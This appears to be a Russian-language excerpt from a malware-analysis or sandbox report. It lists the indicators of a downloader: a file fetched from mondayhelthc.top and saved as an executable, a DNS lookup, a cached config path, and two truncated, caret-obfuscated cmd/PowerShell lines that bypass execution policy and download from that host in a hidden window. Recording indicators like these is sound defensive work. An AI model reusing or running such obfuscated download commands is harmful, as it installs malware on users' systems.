Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwe^rS^H^E^Ll.^exe -E^xecuTi^oN^poLIcY B^ypaSS^ -noP^rofi^le^ -^WINdOWS^t^ylE ^hI^D^dEn ^(NE^w-OB^Jec^T Sys^TE^M^.NET.^WEb^C^LI^EN^T)^.^D^OwN^loaDf^Il^E(^'http://mondayhelthc....
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "pOwe^rS^H^E^Ll.^exe -E^xecuTi^oN^poLIcY B^ypaSS^ -noP^rofi^le^ -^WINdOWS^t^ylE ^hI^D^dEn ^(NE^w-OB^Jec^T Sys^TE^M^.NET.^WEb^C^LI^EN^T)^.^D^OwN^loaDf^Il^E(^'http://mondayhelthc.... (со скрытым окном)